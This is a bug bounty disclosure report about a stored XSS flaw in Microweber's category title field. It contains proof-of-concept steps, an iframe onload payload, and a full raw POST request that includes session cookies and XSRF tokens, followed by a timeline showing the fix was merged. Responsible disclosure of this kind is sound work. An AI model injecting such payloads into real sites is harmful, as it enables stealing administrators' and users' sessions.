Stored XSS on Categories in microweber/microweber

Valid

Reported on

Aug 7th 2022


Description

Title parameter in the body of POST request when creating/editing a category is vulnerable to stored XSS.

Proof of Concept

1 - Go to https://demo.microweber.org/demo/admin/view:content/action:categories

2 - Create a category or edit an existing one.

3 - Modify the title to an XSS Payload: "><iframe onload=prompt(1)>

4 - Save it, And upon visiting categories or shop / when users visit the website an XSS popup will appear.

Screenshots and Video POC

https://drive.google.com/drive/folders/155GUYDLkFpgezR8LiaI3rl4Ej57aDoKq?usp=sharing

Post Request Body

POST /demo/api/category/1 HTTP/1.1
Host: demo.microweber.org
Cookie: XSRF-TOKEN=eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0%3D; _ga=GA1.2.1359565319.1659876932; _gid=GA1.2.1567963331.1659876932; laravel_session=42b3afHcNXtB19Y9WXCTYwCrkC5rdAzi7VTQLPQO; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=2%7CTtYWLvivLcGGOKkv5QqtzWhOA7vw6wZPZIbryyJKGsVNHLLfQ4n75QWDNFH8%7C%242y%2410%24114oPbqv.UAg3ca706prIuSTMe3pAc9qYqT2gOBR1uldB9UTk%2FlYu; twk_uuid_599594841b1bed47ceb0520f=%7B%22uuid%22%3A%221.4glA0q3vlKWq3BfdxhMkPX4cwzUwXXo76pb7kSGBL4d01XmOfGrB5YUtfJiyyjGf3YtQ6HwVYvpP2MFZv1Y2QXpWjDE2AlDvkxDrT0tRsmrXgc3eNutuKPNKkVG9btJEhtmKHMjNDxMVUPhAM1k%22%2C%22version%22%3A3%2C%22domain%22%3A%22microweber.org%22%2C%22ts%22%3A1659876933445%7D; back_to_admin=https%3A//demo.microweber.org/demo/admin/category/1/edit
Content-Length: 348
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Accept: application/json, text/javascript, */*; q=0.01
X-Xsrf-Token: eyJpdiI6IlJ1SDdTaU1pTENXbnFHRStHL3NQMlE9PSIsInZhbHVlIjoiT2Q3bUZDV0dmZzVXSk8xOVVTWW1PcEFURDl2bW9BN0FUNHRKWUFxYnpLUUlWTlZCelRVWGp5anl1Z29GRmNzMnpxcEJCcU1aNzdTMWpGbE8weEFlMDF3UUthTmRHaVlxNDVraUxwTHk4Uk4wK2twbWp5OW9lQ1ZscUVobG01Q1MiLCJtYWMiOiJhYjkwMTc0ZjY5NDcxODVjMTIyNjJjOGIyYTM1MmE3N2Y1YjIyMGZhMzFlYTgwNjgxMjkyZDkzZDg0Y2IyNGVlIiwidGFnIjoiIn0=
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://demo.microweber.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.microweber.org/demo/admin/category/1/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

id=1&rel_type=content&rel_id=8&data_type=category&parent_id=0&_method=PATCH&title=%22%3E%3Ciframe+onload%3Dprompt(document.domain)%3E&category-parent-selector=8&description=&position=0&thumbnail=&url=accessoaries&users_can_create_content=0&category_subtype=default&category_meta_title=&category_meta_description=&category_meta_keywords=&is_hidden=0

Impact

Attackers can steal admin/users cookies

We are processing your report and will contact the microweber team within 24 hours. 2 months ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov validated this vulnerability a month ago
Amine has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 60eef7 a month ago
Peter Ivanov has been awarded the fix bounty
to join this conversation